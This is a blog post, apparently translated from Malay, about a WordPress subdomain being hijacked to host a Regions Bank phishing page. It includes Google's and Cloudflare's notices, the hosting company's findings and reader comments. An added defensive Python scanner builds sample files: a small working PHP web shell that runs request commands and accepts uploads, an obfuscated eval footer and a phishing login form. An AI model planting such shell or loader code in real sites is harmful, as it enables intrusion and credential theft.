Chronology of the phishing attack on the Denaihati blog


Assalamualaikum and salam 1Dunia. It was a real shock to open the Denaihati blog and be met with a big warning: "Warning: Suspect phishing page". Within an hour I received all sorts of messages from fellow bloggers who could not get into the Denaihati blog, and some even wrote dedicated posts about it. What actually happened was my own fault: I honestly did not expect the warning Google gave to be this serious.

Google's warning on 29/5/2012

Dear site owner or webmaster of denaihati.com,

We recently discovered that some pages on your site look like a possible phishing attack, in which users are encouraged to give up sensitive information such as login credentials or banking information. We have removed the suspicious URLs from Google.com search results and have begun showing a warning page to users who visit these URLs in certain browsers that receive anti-phishing data from Google.

Below are one or more example URLs on your site which may be part of a phishing attack:

http://www.info.denaihati .com//wpau-backup/wp-content/index/index.html

We strongly encourage you to investigate this immediately to protect users who are being directed to a suspected phishing attack being hosted on your web site. Although some sites intentionally host such attacks, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn’t monitor for malicious user-contributed content

If your site was compromised, it’s important to not only remove the content involved in the phishing attack, but to also identify and fix the vulnerability that enabled such content to be placed on your site. We suggest contacting your hosting provider if you are unsure of how to proceed.

Once you’ve secured your site, and removed the content involved in the suspected phishing attack, or if you believe we have made an error and this is not actually a phishing attack, you can request that the warning be removed by visiting http://www.google.com/safebrowsing/report_error/?tpl=emailer and reporting an “incorrect forgery alert.” We will review this request and take the appropriate actions.

Sincerely,
Google Search Quality Team

I received the warning email from Google just as I was about to set off on the Kembara Musafir Beijing trip, so I was busy travelling and forgot to act on it. As a result of taking Google's warning lightly, the Denaihati blog was blocked at about 10.20 pm on 30/5/2012 on suspicion of being the source of a phishing attack against a bank in the USA. I got the first message from Datin Tyka at 10.25 pm, thank you. Below are the details provided by Cloudflare.

[CloudFlare] has received a phishing report regarding your site, 30/5/2012

CloudFlare received an abuse report regarding:
denaihati.com

Details about alleged infringement:
Team,

We are an Internet security company in the United States working on behalf of Regions Bank. We are contacting your organization to report phishing content targeting Regions Bank’s brand and customers that was detected on 5/30/2012. Our research shows that your organization provides hosting and/or IP services for a website that’s been compromised and is currently being used in a phishing attack. Please investigate the threat at the location(s) below:

http://www.info.denaihati.com//regions/index.html

IP Address: 141.101.124.216

This is an illegal and unauthorized copy of Regions Bank’s website that was created in an attempt to trick Regions Bank’s customers into sending sensitive personal and financial data to online criminals. We request that you deactivate this threat on your network immediately. If you are not the appropriate staff to handle this, we ask that you escalate this matter to the attention of those within your organization who can resolve this abuse issue.

Regards,

Security Incident Response Team

I quickly emailed Serverfreak to help sort out the problem. As usual, in under 3 minutes Serverfreak replied, proposing to cut off connections to the subdomain info.denaihati.com, which was the source of the trouble. I scratched my head wondering why I had not thought of this the day before. Serverfreak then investigated what had actually gone wrong for the Denaihati blog to become the source of a phishing attack.

Information from Serverfreak:

In that info folder they uploaded a shell script and then uploaded a few phishing sites.

If I understood correctly, that means someone, from who knows where, uploaded several phishing scripts into the theme of the subdomain info.denaihati.com and used them to attack Regions Bank. (What Serverfreak calls a shell script is, in this context, most likely a web shell: a PHP file that lets the attacker upload further files and run commands through the browser, which is how the copy of the Regions Bank site got there. The note says what was uploaded, not how the attacker got write access in the first place.) Had we ever imagined it could happen like this? For the record, I got the info.denaihati.com theme for free, for winning a contest. I am reminded of a line in a post on Problogger.net that feels about right when it comes to using free themes.

So let’s just say it out loud so we can put it behind us: Forget about free themes! They are evil! This is something I’ve been saying for a little more than a year now. And hey, don’t blame me, it’s just the way it is. Almost all free WordPress themes include some kind of strange code in their structures, usually in the footer section. The code is encrypted, and, often, the theme stops working if you try to remove it. Also, you don’t have a clue about what’s actually in that code until you decrypt it. Just to make things clear, as a developer, designer, or simply a website owner, you never want to have any unknown code on your site.
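As an added example (not code from the original post, from Serverfreak or from Problogger), the following Python script does the check a site owner would want after a report like the two above: it walks a WordPress tree and flags obfuscated code in theme files (the "encrypted" footer code the quote describes), PHP files sitting where only uploaded media should live, the usual command-execution and file-upload primitives of a web shell, and static HTML pages carrying a credential form, which is what a bank phishing kit's index.html looks like. The rule names, the regexes and the sample files it builds in a temporary directory are all my own constructions for the demonstration, not the real denaihati.com files.

```python
import os
import re
import tempfile
from dataclasses import dataclass

# Heuristics for the two things Serverfreak's note describes: obfuscated code
# planted in a theme and an uploaded web shell. Assumption: these indicators
# are my own choice for the example, not anything from the original post.
PHP_RULES = {
    "eval_of_decoded": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "base64_decode": re.compile(r"base64_decode\s*\(", re.I),
    "long_base64_blob": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
    "exec_of_request": re.compile(
        r"\b(?:system|shell_exec|passthru|exec|popen|proc_open)\s*\(\s*"
        r"\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    "move_uploaded_file": re.compile(r"move_uploaded_file\s*\(", re.I),
}
# A phishing kit's landing page is usually static HTML with a credential form
# posting to a PHP collector, so HTML files get a separate check.
HTML_FORM = re.compile(r"<form\b", re.I)
HTML_PASSWORD = re.compile(r"type\s*=\s*['\"]?password", re.I)


@dataclass(frozen=True)
class Finding:
    path: str   # path relative to the scanned root, always with "/" separators
    rule: str
    line: int   # 0 when the finding is about the whole file, not one line


def scan_file(root: str, path: str) -> list[Finding]:
    """Apply the PHP rules or the HTML rule to one file, depending on extension."""
    rel = os.path.relpath(path, root).replace(os.sep, "/")
    ext = os.path.splitext(path)[1].lower()
    findings: list[Finding] = []
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    except OSError:
        return findings
    if ext in (".php", ".phtml", ".php5"):
        # WordPress stores media under wp-content/uploads; PHP there is a red flag.
        if "/wp-content/uploads/" in "/" + rel:
            findings.append(Finding(rel, "php_in_uploads", 0))
        for no, text in enumerate(lines, 1):
            for rule, pat in PHP_RULES.items():
                if pat.search(text):
                    findings.append(Finding(rel, rule, no))
    elif ext in (".html", ".htm"):
        body = "\n".join(lines)
        if HTML_FORM.search(body) and HTML_PASSWORD.search(body):
            findings.append(Finding(rel, "html_login_form", 0))
    return findings


def scan_tree(root: str) -> list[Finding]:
    """Walk the whole site and return findings sorted by path, line and rule."""
    out: list[Finding] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            out.extend(scan_file(root, os.path.join(dirpath, name)))
    return sorted(out, key=lambda f: (f.path, f.line, f.rule))


def build_sample_site(root: str) -> None:
    """Constructed sample tree: one clean theme file, one obfuscated footer,
    one web shell in the uploads directory and one phishing landing page."""
    samples = {
        "wp-content/themes/freebie/header.php":
            "<!DOCTYPE html><html><head><?php wp_head(); ?></head><body>\n",
        "wp-content/themes/freebie/footer.php":
            "<?php wp_footer(); ?>\n"
            "<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygneCcpKXt9')); ?>\n"
            "<?php $_x = '" + "Q" * 240 + "'; ?>\n"
            "</body></html>\n",
        "wp-content/uploads/2012/05/up.php":
            "<?php\n"
            "if (isset($_REQUEST['cmd'])) { echo shell_exec($_REQUEST['cmd']); }\n"
            "if (isset($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'],"
            " basename($_FILES['f']['name'])); }\n",
        "regions/index.html":
            "<html><body><form method=\"post\" action=\"login.php\">\n"
            "<input name=\"user\"><input type=\"password\" name=\"pass\">\n"
            "<input type=\"submit\" value=\"Log in\"></form></body></html>\n",
    }
    for rel, content in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo() -> list[Finding]:
    """Build the sample site in a temp directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.rule:18} {f.path}:{f.line}")
```

Point `scan_tree()` at the document root of the affected subdomain rather than the sample site to use it for real. The rules are deliberately noisy: `base64_decode` also appears in legitimate plugins, so treat a single hit as a lead to read the file, and treat `eval` of decoded data, PHP under `wp-content/uploads`, or an HTML login form outside the theme as something to pull offline immediately. Cleaning the flagged files is only half the job; as Google's email says, the write access that let them in still has to be found and closed.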

Once everything had been resolved, I sent a request to Google to remove the Denaihati blog from the phishing warning list. Alhamdulillah, at 2.15 am on 31/5/2012 I received an email from Google.

Phishing problem [Abuse and DMCA reports]

From: Justin
Subject: Phishing problem

The phishing warning has been removed from the domain.

Blog traffic plummeted because of the phishing attack case

The problem did not end there: on 31/5 and 1/6 the Denaihati blog's traffic plummeted by 75%. Alhamdulillah, on 2/6/2012, with Eizil's help reconfiguring Cloudflare, traffic returned to normal and the admin panel was accessible again as before.

I learned a lot from this incident. Once again Serverfreak has proved reliable. To those looking for the best hosting, don't miss the SF – Denaihati offer. What about you, fellow readers: what can be learned from this phishing attack case?


162 Comments

  1. Alhamdulillah. Finally back to normal.

    Thank you Bro DH for sharing this post. From what I understand, free stuff, especially free themes (even more so if downloaded from rapidshare), can sometimes be very dangerous.

  2. Phew... so it came from a subdomain... really dangerous... people will look for any opportunity to do things like this... I wonder where the perpetrator was from, bro, Malaysia or abroad?

    1. This is probably what the veteran bloggers keep saying: don't be too keen on free themes. Sometimes there are hidden scripts ready to wreck our blog... dangerous.

  3. The info I read is still confusing to take in,
    I don't know how this could happen,
    Perhaps this problem is too big to overcome,
    It needs an expert to handle.

  4. There is no problem that cannot be solved,
    Only big ones and small ones,
    DH's blog has been restored,
    May there be more info to read.

  5. DH needs to write many more posts about this problem; maybe this is just the beginning, because the causes have been explained but how to fix it or remove the phishing is still vague, I don't know how. Perhaps removing it is not an easy thing to do without consulting an expert like Eizil.

  6. It feels like this was to be expected, like it's the season... there are some template/theme scripts that people plant (or deliberately send out)... many friends overseas have already been hit (as noted in the article), from high- to medium-traffic sites. Meaning, incidents like this can happen to anyone's blog/domain. Let's all be careful and stay on good terms with our hosting... To DH, it looks like you are still under Google's watch... let's all help restore DH's traffic...
